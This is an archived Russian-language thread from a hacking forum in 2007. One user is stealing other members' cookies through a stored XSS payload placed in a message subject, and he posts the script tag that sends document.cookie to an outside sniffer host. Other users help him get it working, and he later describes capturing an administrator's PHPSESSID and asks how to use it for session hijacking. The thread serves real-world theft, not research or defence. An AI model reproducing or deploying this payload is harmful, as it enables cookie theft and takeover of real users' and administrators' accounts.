Просмотр полной версии : Подскажите
Perec333
09.09.2007, 17:30
Подскажите плиз, почему на эту ссылку, на снифак приходят тока мои куки(xss в теме сообщения)
<script>img = new Image(); img.src = "http://s.netsec.ru/mda.gif?"+document.cookie;</script>
0nep@t0p
09.09.2007, 18:40
Хм, наверное потому что пока только ты просмотрел эту тему
inlanger
09.09.2007, 18:52
"http://s.netsec.ru/mda.gif?"
вместо mda.gif впиши свой_ник.gif
Perec333
09.09.2007, 21:27
я конечно не знаток в хаке но со сниффером справиться могу и сообщение мои читали(так как на них отвечали))) Есть еще предложения?)) Вот еще зашел под другим пользователем посмотрел письмо с xss которое я отправил от другово своего пользователи, кукисы пришли, как будто на сниф только мои приходят
blackybr
10.09.2007, 11:14
Сомневаюсь в подобном раскладе. Если они все таки заходят, то не может быть в принципе что твои приходят, а их нет.
я конечно не знаток в хаке но со сниффером справиться могу и сообщение мои читали(так как на них отвечали))) Есть еще предложения?)) Вот еще зашел под другим пользователем посмотрел письмо с xss которое я отправил от другово своего пользователи, кукисы пришли, как будто на сниф только мои приходят
А ты недумал что в некоторвх браузерах XSS непашет :)
Perec333
10.09.2007, 15:43
Дык не на одном человеке проверял, у всех непохать не может))))
Perec333
10.09.2007, 22:22
наконецто поймал кукисы но тут возник другой вопрос, поймал PHPSESSID админа через инеткрэк послал пакет , посмотрел его страницу в инет креке, как я могу это использовать?в кукисах PHPSESSID не нахожу, они создаются тока когда ставишь галочку на "запомнить мнея" в виде login- xxxx pass-md5(xxx) а PHPSESSID нету...
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot